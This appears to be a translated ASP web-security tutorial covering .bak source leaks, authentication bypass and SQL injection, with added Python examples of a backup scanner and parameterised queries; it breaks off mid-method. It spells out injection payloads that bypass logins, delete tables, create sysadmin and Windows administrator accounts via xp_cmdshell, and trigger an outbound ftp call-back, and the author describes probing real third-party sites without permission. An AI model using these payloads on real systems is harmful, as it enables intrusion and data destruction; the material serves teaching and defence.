SQL injection attacks and Prevention


Author: Ako, from Coke Heaven

Akol: At the request of netizens, I am publishing an SQL injection tutorial written in. The injection part has been discussed too many times already, so you do not need to read it; the other techniques and protection methods in this article are worth a look.
================================================================================
I have never studied ASP or PHP programming systematically, nor Access, SQL Server, MySQL or any other database. So I am not a programmer, although I often do work similar to a programmer's.
Because we needed to build our own site, I have gone through three revisions of it and written thousands of lines of code. In addition, testing forums, message boards and article publishing systems turned up some problems, which I will discuss with you now.
While writing this article, besides setting up ASP + Access and ASP + SQL Server test environments on my own machine, I also ran some tests against the websites of xx security website, xx city talent network and xx network company, for which I apologise! The tests were run at ~ am and limited to search operations, so I am certain they had almost no impact on those sites. Trading a little traffic for a security report within the hour does not seem like a bad deal to me, heh.
1. .bak files leaking ASP source code
Many editors, such as EditPlus and UltraEdit, automatically save a .bak backup copy by default when a file is saved. For example, when you create or edit config.asp, the editor generates config.asp.bak alongside it. If that .bak file is uploaded to the web server and not deleted, an attacker can download the ASP source simply by requesting http://www.***.com/config.asp.bak: the web server does not execute .bak files, so it serves the raw file contents.
As you can imagine, once your source has been downloaded the risk of a successful attack rises sharply. A configuration file alone gives away the user name, password, database name and location ......
Solution: either disable the editor's automatic backup function or delete all .bak files (and similar editor leftovers such as files ending in ~ or .old) before uploading.
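The check a practitioner would run before every upload, as an added example that is not part of the original article: walk the web root and list every file that looks like an editor backup of a source file. The suffix list and the sample web root built in demo() are my own assumptions; extend BACKUP_SUFFIXES to match the editors your team uses.

```python
import os
import tempfile

# Suffixes editors and deploy scripts commonly leave behind (assumed list):
# ".bak" from EditPlus/UltraEdit, "~" from Emacs/Vim backups, ".swp" from
# Vim swap files, ".orig"/".old"/".tmp" from patch tools and manual copies.
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".tmp", "~", ".swp")


def find_backup_files(webroot):
    """Return the paths (relative to webroot, with forward slashes) of files
    that look like editor backups, e.g. config.asp.bak next to config.asp.
    Emacs lock files (".#name") are caught by the prefix test."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for fname in files:
            if fname.endswith(BACKUP_SUFFIXES) or fname.startswith(".#"):
                rel = os.path.relpath(os.path.join(dirpath, fname), webroot)
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)


def demo():
    """Constructed web root: two real ASP pages and two stray backups
    (sample data, not from any real site)."""
    root = tempfile.mkdtemp()
    for rel in ("config.asp", "config.asp.bak", "inc/db.asp", "inc/db.asp~"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write("<% ' constructed sample %>\n")
    return find_backup_files(root)


if __name__ == "__main__":
    for hit in demo():
        print("stray backup file:", hit)
```

Run it against the directory you are about to upload; an empty result is the only acceptable one. Note that this catches leftovers on the way out, but it does not protect a file that is already on the server, so also check the live web root once.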
2. Authentication bypass
In general, many pages of a website should be accessible only after authentication. Each of these pages must verify the user's identity again, but many programmers ignore this. If an attacker knows the path and file name of such a page, they can bypass the login and request the page directly. For example, suppose you log in through login.asp and are only then sent to manage.asp: an attacker can open the management interface directly via http://www.***.com/manage.asp, because the URL by itself is not a secret.
Solution: confirm the identity at the beginning of every protected page. For example, after the login succeeds, set Session("login") = "OK", and add the following at the top of manage.asp (and of every other protected page; putting the check in an include file makes it harder to forget):
The following is the program code:

If Session("login") <> "OK" Then
    Response.Redirect "login.asp"
End If
 

The above two points are basic programming issues. The focus of this article, SQL injection attacks and prevention, is discussed below.
3. ASP database password verification vulnerability
First, a word about the Request object. If a form passes data with the GET method, it should be read from the QueryString collection; if it uses POST, from the Form collection. For convenience, many programmers omit the collection name and simply write Request("data"). That looks simpler but is in fact slower and error-prone: by default ASP searches the collections in the order QueryString, Form, Cookies, ClientCertificate, ServerVariables and returns the first match, so a value placed in the URL silently overrides the one the programmer expected to come from the form or a cookie. We therefore recommend not using this shorthand. With that out of the way, let's proceed to the subject.
First, let's look at the login.asp file.
The following is the program code:

......
<form action="verify.asp" method="post" name="login">
Username <input type="text" name="name" value="" maxlength="20">
Password <input type="password" name="pwd" value="" maxlength="20">
<input type="submit" name="bt" value="OK">
<input type="reset" name="bt" value="reset">
</form>
......
 

Let's take a look at the verify.asp file.
The following is the program code:

......
Dim rs, SQL
Dim name, pwd
name = Request.Form("name")
pwd = Request.Form("pwd")

If name = "" Or pwd = "" Then
    Response.Redirect "login.asp"
End If
......
' Identity authentication: the user's input is spliced straight into the SQL text
SQL = "select * from user where name='" & name & "' and pwd='" & pwd & "'"
......
 

Do not think that nobody writes code like this. I have seen many people do it. If you do not believe me, look at what an attacker can do:
(1) Enter [admin' or '1'='1] in the user name field and [11] in the password field. Note: only the text inside the brackets is entered. See what SQL becomes:
The following is the program code:

SQL = select * from user where name='admin' or '1'='1' and pwd='11'

Here or is a logical operator. In SQL, and binds more tightly than or, so the condition is read as name='admin' or ('1'='1' and pwd='11'). The first half is true for the admin row whatever the password is, so the query returns that row: the password check has been bypassed and we can log in as any user whose name we know.
(2) You can also enter [admin' --] in the user name field and [11] in the password field. Look at SQL:
The following is the program code:

SQL = select * from user where name='admin' --' and pwd='11'

Similarly, the password check is commented out by the -- comment marker; SQL Server ignores everything after it. This does not work against an Access database, because Jet SQL has no -- comment syntax.
(3) If a comment marker can remove the rest of the query, it gets more interesting. Let's see what else we can do when the database is SQL Server, which executes several statements separated by ; as one batch:
A. Enter [admin'; exec master.dbo.sp_addlogin Cool; --] in the user name field to add a SQL Server login named Cool.
B. Enter [admin'; exec master.dbo.sp_password null, 123456, Cool; --] in the user name field to set Cool's password to 123456.
C. Enter [admin'; exec master.dbo.sp_addsrvrolemember Cool, sysadmin; --] in the user name field to grant Cool the sysadmin server role.
D. Enter [admin'; exec master.dbo.xp_cmdshell 'net user Cool 123456 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add'; --] in the user name field to add a Windows account Cool with the password 123456 to the operating system and set its properties (see the documentation of the net user command).
E. Enter [admin'; exec master.dbo.xp_cmdshell 'net localgroup administrators Cool /add'; --] in the user name field to add Cool to the local Administrators group.
I think that is frightening enough, and I am not done yet. To get this far, the site must connect to the database as sa or another login with sysadmin rights. That is rare on ordinary shared virtual hosting unless the administrator is careless, but sites hosted on their own servers are a different story; I have seen plenty of them.
If the connection is not sa, is there nothing to be done? Of course not! We can no longer take over the SQL Server instance or the operating system, but we still have full rights within this one database. Let's see what we can do:
A. Enter [admin'; delete from user; --]. If the table really is called user, every record in it is deleted. That is brutal. You must never do this!
B. Enter [admin'; insert into user (name, pwd) values ('cool', '123456'); --] to add a user to the user table. The premise is that the table and column names are correct.
C. Enter [admin'; update user set pwd='123456' where name='admin'; --] to change the admin password, again provided the table and column names are correct.
(On SQL Server, USER is a reserved word, so a table actually named user has to be written [user] in these statements.)
For more attack content, refer to the SQL syntax.
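The three techniques above (the or tautology, the -- comment and the stacked statement) and the parameterised fix, carried through against a real database so you can watch each query succeed or fail. This is an added example, not code from the original article: it rebuilds verify.asp's concatenated query in Python over an in-memory SQLite table (constructed sample data, columns name and pwd as on the page) instead of ASP + SQL Server. sqlite3's executescript() is used as a stand-in for an interface that runs a whole batch, as ADO does against SQL Server; SQLite itself supports -- comments, so techniques (1) and (2) behave as they would on SQL Server.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the article's user table
    (columns name, pwd). Clear-text passwords mirror verify.asp only."""
    con = sqlite3.connect(":memory:")
    con.execute("create table user (name text, pwd text)")
    con.executemany("insert into user values (?, ?)",
                    [("admin", "s3cret"), ("guest", "guest")])
    con.commit()
    return con


def build_query(name, pwd):
    # Exactly the string verify.asp builds: the input becomes part of the SQL text.
    return "select name from user where name='" + name + "' and pwd='" + pwd + "'"


def login_vulnerable(con, name, pwd):
    """Single-statement execution of the concatenated query.
    Returns the names of the rows the query matched."""
    return [row[0] for row in con.execute(build_query(name, pwd))]


def login_vulnerable_batch(con, name, pwd):
    """The same concatenated query sent through an interface that executes a
    whole batch (executescript stands in for ADO + SQL Server behaviour).
    Returns the names left in the table afterwards."""
    con.executescript(build_query(name, pwd))
    return [row[0] for row in con.execute("select name from user")]


def login_safe(con, name, pwd):
    """Parameterised query: SQL text and values travel separately, so quotes,
    'or', '--' and ';' in the input remain plain data."""
    sql = "select name from user where name=? and pwd=?"
    return [row[0] for row in con.execute(sql, (name, pwd))]


# The article's payloads, one per technique (password field is "11").
PAYLOAD_OR = "admin' or '1'='1"                   # (1) tautology
PAYLOAD_COMMENT = "admin' --"                      # (2) comment out the password check
PAYLOAD_STACKED = "admin'; delete from user; --"   # (3) stacked statement


def demo():
    con = make_db()
    results = {
        "or": login_vulnerable(con, PAYLOAD_OR, "11"),             # ['admin']
        "comment": login_vulnerable(con, PAYLOAD_COMMENT, "11"),   # ['admin']
        "safe_or": login_safe(con, PAYLOAD_OR, "11"),              # []
        "safe_comment": login_safe(con, PAYLOAD_COMMENT, "11"),    # []
        "safe_ok": login_safe(con, "admin", "s3cret"),             # ['admin']
    }
    # Run the destructive payload last: it empties the table.
    results["after_stacked"] = login_vulnerable_batch(con, PAYLOAD_STACKED, "11")  # []
    return results


if __name__ == "__main__":
    for technique, outcome in demo().items():
        print(technique, outcome)
```

The parameterised form is the fix the article's title promises: the database receives name=? and pwd=? as the statement and the user's text purely as values, so there is no way for a quote or a comment marker to change the statement's shape. Whitelisting or escaping the input is a weaker second line of defence; use it in addition to parameters, not instead of them.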
It seems that sa is the depressing case. There is also a simple way to find out whether the site connects to the database as sa.
A. Run nc -l -p 21 in cmd to listen on port 21 of your own machine. You can also watch a firewall log instead.
B. Enter [admin'; exec master.dbo.xp_cmdshell 'ftp *.*.*.*'; --], where *.*.*.* is your IP address. If a connection arrives, the site is using sa (xp_cmdshell needs sysadmin rights), and you also learn the IP address of the database server, since some sites run the web server and SQL Server on different machines. If no connection arrives, the site uses a non-sa account (or outbound traffic from the database server is blocked).
As some readers will have noticed, if the site uses sa we can make the internal server initiate outbound connections from within the page, construct an ftp script or use tftp to upload files, even if there is a firewall in front of it.
Some may say that the maxlength of the form fields is 20, so you cannot type that much! True, but it does not stop us: maxlength is enforced only by the browser, never by the server, so any client that posts the form directly ignores it.
Method 1:
A. Open the site's page http://www.***.com/login.asp, view the source, and copy out the form part:
The following is the program code:

<form action="verify.asp" method="post" name="login">
Username <input type="text" name="name" value="" maxlength="20">
Password <input type="password" name="pwd" value="" maxlength="20">
<input type="submit" name="bt" value="OK">
<input type="reset" name="bt" value="reset">
</form>

Save it as login.htm.
B. Change the action to the absolute URL http://www.***.com/verify.asp, that is:
The following is the program code:

<form action="http://www.***.com/verify.asp" method="post" name="login">
Username <input type="text" name="name" value="" maxlength="20">
Password <input type="password" name="pwd" value="" maxlength="20">
<input type="submit" name="bt" value="OK">
<input type="reset" name="bt" value="reset">
</form>
